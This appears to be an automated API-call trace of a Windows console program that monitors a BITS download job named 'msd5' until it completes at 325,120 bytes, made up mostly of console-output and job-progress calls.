[0078.444] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1af040, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af040*=0x8) returned 1
[0078.444] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0078.444] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af030 | out: lpConsoleScreenBufferInfo=0x1af030) returned 1
[0078.444] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1af048, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af048*=0x8) returned 1
[0078.444] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0078.445] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af024 | out: lpConsoleScreenBufferInfo=0x1af024) returned 1
[0078.445] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1af03c, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af03c*=0xc) returned 1
[0078.445] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0078.445] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af034 | out: lpConsoleScreenBufferInfo=0x1af034) returned 1
[0078.445] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1af04c, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af04c*=0xa) returned 1
[0078.445] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0078.450] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af01c | out: lpConsoleScreenBufferInfo=0x1af01c) returned 1
[0078.450] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1af034, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af034*=0xa) returned 1
[0078.450] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0078.450] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af024 | out: lpConsoleScreenBufferInfo=0x1af024) returned 1
[0078.450] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1af03c, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af03c*=0x8) returned 1
[0078.450] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0078.451] _vsnwprintf (in: _Buffer=0x5703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1af048 | out: _Buffer="0") returned 1
[0078.451] _vsnwprintf (in: _Buffer=0x5703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1af054 | out: _Buffer="1") returned 1
[0078.451] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af024 | out: lpConsoleScreenBufferInfo=0x1af024) returned 1
[0078.451] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1af03c, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af03c*=0x5) returned 1
[0078.451] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0078.451] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af02c | out: lpConsoleScreenBufferInfo=0x1af02c) returned 1
[0078.452] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1af044, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af044*=0x8) returned 1
[0078.452] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0078.452] _vsnwprintf (in: _Buffer=0x5703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1af050 | out: _Buffer="0") returned 1
[0078.452] _vsnwprintf (in: _Buffer=0x5703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1af054 | out: _Buffer="325120") returned 6
[0078.452] _vsnwprintf (in: _Buffer=0x5703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1af050 | out: _Buffer="0") returned 1
[0078.452] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af03c | out: lpSystemTimeAsFileTime=0x1af03c*(dwLowDateTime=0xdf582050, dwHighDateTime=0x1d469c7))
[0078.452] _finite (_X=0x0) returned 1
[0078.452] _finite (_X=0x0) returned 1
[0078.452] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1aeffc | out: lpConsoleScreenBufferInfo=0x1aeffc) returned 1
[0078.452] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x1af014, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af014*=0x11) returned 1
[0078.453] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0078.453] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af008 | out: lpConsoleScreenBufferInfo=0x1af008) returned 1
[0078.453] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x1af020, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af020*=0xf) returned 1
[0078.453] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0078.453] _vsnwprintf (in: _Buffer=0x1aee34, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x1aedf8 | out: _Buffer="0.00 B/S") returned 8
[0078.453] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af04c | out: lpConsoleScreenBufferInfo=0x1af04c) returned 1
[0078.454] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1af064, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af064*=0x8) returned 1
[0078.454] CoTaskMemFree (pv=0x3183b8)
[0078.454] PeekMessageW (in: lpMsg=0x1af9c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1af9c0) returned 0
[0078.455] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x1af9e8*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0078.945] PeekMessageW (in: lpMsg=0x1af9c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1af9c0) returned 1
[0078.945] TranslateMessage (lpMsg=0x1af9c0) returned 0
[0078.945] DispatchMessageW (lpMsg=0x1af9c0) returned 0x1
[0078.945] IBackgroundCopyCallback:JobModification (This=0x320c70, pJob=0x30a6ac, dwReserved=0x0) returned 0x0
[0078.945] IBackgroundCopyJob:GetState (in: This=0x30a61c, pVal=0x320c7c | out: pVal=0x320c7c) returned 0x0
[0078.946] KillTimer (hWnd=0x0, uIDEvent=0x7fba) returned 1
[0078.946] IBackgroundCopyJob:GetType (in: This=0x30a61c, pVal=0x1af088 | out: pVal=0x1af088) returned 0x0
[0078.947] IBackgroundCopyJob:GetProgress (in: This=0x30a61c, pVal=0x320c80 | out: pVal=0x320c80) returned 0x0
[0078.948] IBackgroundCopyJob:GetPriority (in: This=0x30a61c, pVal=0x1af084 | out: pVal=0x1af084) returned 0x0
[0078.949] CoTaskMemFree (pv=0x0)
[0078.949] IBackgroundCopyJob:GetDisplayName (in: This=0x30a61c, pVal=0x1af09c | out: pVal=0x1af09c*="msd5") returned 0x0
[0078.950] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af044 | out: lpConsoleScreenBufferInfo=0x1af044) returned 1
[0078.950] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x1af05c | out: lpNumberOfCharsWritten=0x1af05c) returned 1
[0078.950] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x1af05c | out: lpNumberOfAttrsWritten=0x1af05c) returned 1
[0078.950] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0078.951] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0078.951] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af030 | out: lpConsoleScreenBufferInfo=0x1af030) returned 1
[0078.951] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1af048, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af048*=0xa) returned 1
[0078.951] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0078.952] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af02c | out: lpConsoleScreenBufferInfo=0x1af02c) returned 1
[0078.952] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1af044, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af044*=0x5) returned 1
[0078.952] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0078.952] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af034 | out: lpConsoleScreenBufferInfo=0x1af034) returned 1
[0078.953] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x1af04c, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af04c*=0x7) returned 1
[0078.953] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0078.953] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af028 | out: lpConsoleScreenBufferInfo=0x1af028) returned 1
[0078.953] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1af040, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af040*=0x8) returned 1
[0078.953] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0078.954] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af030 | out: lpConsoleScreenBufferInfo=0x1af030) returned 1
[0078.954] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1af048, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af048*=0x8) returned 1
[0078.954] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0078.954] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af024 | out: lpConsoleScreenBufferInfo=0x1af024) returned 1
[0078.955] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0x1af03c, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af03c*=0xe) returned 1
[0078.955] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0078.955] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af034 | out: lpConsoleScreenBufferInfo=0x1af034) returned 1
[0078.955] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1af04c, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af04c*=0xa) returned 1
[0078.955] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0078.956] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af01c | out: lpConsoleScreenBufferInfo=0x1af01c) returned 1
[0078.956] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1af034, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af034*=0xa) returned 1
[0078.956] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0078.956] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af024 | out: lpConsoleScreenBufferInfo=0x1af024) returned 1
[0078.957] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1af03c, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af03c*=0x8) returned 1
[0078.957] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0078.957] _vsnwprintf (in: _Buffer=0x5703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1af048 | out: _Buffer="0") returned 1
[0078.957] _vsnwprintf (in: _Buffer=0x5703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1af054 | out: _Buffer="1") returned 1
[0078.957] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af024 | out: lpConsoleScreenBufferInfo=0x1af024) returned 1
[0078.957] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1af03c, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af03c*=0x5) returned 1
[0078.958] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0078.958] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af02c | out: lpConsoleScreenBufferInfo=0x1af02c) returned 1
[0078.958] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1af044, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af044*=0x8) returned 1
[0078.958] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0078.958] _vsnwprintf (in: _Buffer=0x5703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1af050 | out: _Buffer="131482") returned 6
[0078.958] _vsnwprintf (in: _Buffer=0x5703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1af054 | out: _Buffer="325120") returned 6
[0078.959] _vsnwprintf (in: _Buffer=0x5703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1af050 | out: _Buffer="40") returned 2
[0078.959] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af03c | out: lpSystemTimeAsFileTime=0x1af03c*(dwLowDateTime=0xdfa44c50, dwHighDateTime=0x1d469c7))
[0078.959] _finite (_X=0x9c54a692) returned 1
[0078.959] _finite (_X=0xba3b4166) returned 1
[0078.959] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1aeffc | out: lpConsoleScreenBufferInfo=0x1aeffc) returned 1
[0078.959] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x17, lpNumberOfCharsWritten=0x1af014, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af014*=0x17) returned 1
[0078.959] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0078.959] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af008 | out: lpConsoleScreenBufferInfo=0x1af008) returned 1
[0078.960] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x1af020, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af020*=0xf) returned 1
[0078.960] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0078.960] _vsnwprintf (in: _Buffer=0x1aee34, _BufferCount=0xfe, _Format="%.2f KB/S", _ArgList=0x1aedf8 | out: _Buffer="180.05 KB/S") returned 11
[0078.960] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af000 | out: lpConsoleScreenBufferInfo=0x1af000) returned 1
[0078.961] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1af018, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af018*=0xc) returned 1
[0078.961] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0078.961] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af008 | out: lpConsoleScreenBufferInfo=0x1af008) returned 1
[0078.961] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x1af020, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af020*=0x10) returned 1
[0078.961] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0078.962] _vsnwprintf (in: _Buffer=0x1aee34, _BufferCount=0xfe, _Format="%I64u Seconds", _ArgList=0x1aedec | out: _Buffer="1 Seconds") returned 9
[0078.962] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1af04c | out: lpConsoleScreenBufferInfo=0x1af04c) returned 1
[0078.962] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x9, lpNumberOfCharsWritten=0x1af064, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1af064*=0x9) returned 1
[0078.962] CoTaskMemFree (pv=0x3183b8)
[0078.963] PeekMessageW (in: lpMsg=0x1af9c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1af9c0) returned 0
[0078.963] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x1af9e8*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0079.090] PeekMessageW (in: lpMsg=0x1af9c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1af9c0) returned 1
[0079.090] TranslateMessage (lpMsg=0x1af9c0) returned 0
[0079.090] DispatchMessageW (lpMsg=0x1af9c0) returned 0x1
[0079.090] IBackgroundCopyCallback:JobTransferred (This=0x320c70, pJob=0x30a6ac) returned 0x0
[0079.090] IBackgroundCopyJob:GetState (in: This=0x30a61c, pVal=0x320c7c | out: pVal=0x320c7c) returned 0x0
[0079.091] IBackgroundCopyCallback:JobModification (This=0x320c70, pJob=0x30a6ac, dwReserved=0x0) returned 0x0
[0079.091] IBackgroundCopyJob:GetState (in: This=0x30a61c, pVal=0x320c7c | out: pVal=0x320c7c) returned 0x0
[0079.092] IBackgroundCopyJob:GetType (in: This=0x30a61c, pVal=0x1adff8 | out: pVal=0x1adff8) returned 0x0
[0079.093] IBackgroundCopyJob:GetProgress (in: This=0x30a61c, pVal=0x320c80 | out: pVal=0x320c80) returned 0x0
[0079.094] IBackgroundCopyJob:GetPriority (in: This=0x30a61c, pVal=0x1adff4 | out: pVal=0x1adff4) returned 0x0
[0079.094] CoTaskMemFree (pv=0x0)
[0079.094] IBackgroundCopyJob:GetDisplayName (in: This=0x30a61c, pVal=0x1ae00c | out: pVal=0x1ae00c*="msd5") returned 0x0
[0079.095] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1adfb4 | out: lpConsoleScreenBufferInfo=0x1adfb4) returned 1
[0079.095] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x1adfcc | out: lpNumberOfCharsWritten=0x1adfcc) returned 1
[0079.096] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x1adfcc | out: lpNumberOfAttrsWritten=0x1adfcc) returned 1
[0079.096] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0079.096] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.097] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1adfa0 | out: lpConsoleScreenBufferInfo=0x1adfa0) returned 1
[0079.097] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1adfb8, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1adfb8*=0xa) returned 1
[0079.097] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.097] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1adf9c | out: lpConsoleScreenBufferInfo=0x1adf9c) returned 1
[0079.097] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1adfb4, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1adfb4*=0x5) returned 1
[0079.098] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.098] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1adfa4 | out: lpConsoleScreenBufferInfo=0x1adfa4) returned 1
[0079.098] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x1adfbc, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1adfbc*=0x7) returned 1
[0079.098] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.099] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1adf98 | out: lpConsoleScreenBufferInfo=0x1adf98) returned 1
[0079.099] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1adfb0, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1adfb0*=0x8) returned 1
[0079.099] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.099] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1adfa0 | out: lpConsoleScreenBufferInfo=0x1adfa0) returned 1
[0079.099] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1adfb8, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1adfb8*=0x8) returned 1
[0079.100] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.100] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1adf94 | out: lpConsoleScreenBufferInfo=0x1adf94) returned 1
[0079.100] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x1adfac, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1adfac*=0xd) returned 1
[0079.100] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.101] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1adfa4 | out: lpConsoleScreenBufferInfo=0x1adfa4) returned 1
[0079.101] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1adfbc, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1adfbc*=0xa) returned 1
[0079.101] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.101] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1adf8c | out: lpConsoleScreenBufferInfo=0x1adf8c) returned 1
[0079.101] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1adfa4, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1adfa4*=0xa) returned 1
[0079.102] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.102] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1adf94 | out: lpConsoleScreenBufferInfo=0x1adf94) returned 1
[0079.102] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1adfac, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1adfac*=0x8) returned 1
[0079.102] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.103] _vsnwprintf (in: _Buffer=0x5703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1adfb8 | out: _Buffer="1") returned 1
[0079.103] _vsnwprintf (in: _Buffer=0x5703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1adfc4 | out: _Buffer="1") returned 1
[0079.103] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1adf94 | out: lpConsoleScreenBufferInfo=0x1adf94) returned 1
[0079.103] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1adfac, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1adfac*=0x5) returned 1
[0079.103] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.103] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1adf9c | out: lpConsoleScreenBufferInfo=0x1adf9c) returned 1
[0079.104] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1adfb4, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1adfb4*=0x8) returned 1
[0079.104] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.104] _vsnwprintf (in: _Buffer=0x5703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1adfc0 | out: _Buffer="325120") returned 6
[0079.104] _vsnwprintf (in: _Buffer=0x5703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1adfc4 | out: _Buffer="325120") returned 6
[0079.104] _vsnwprintf (in: _Buffer=0x5703f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1adfc0 | out: _Buffer="100") returned 3
[0079.104] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1adfbc | out: lpConsoleScreenBufferInfo=0x1adfbc) returned 1
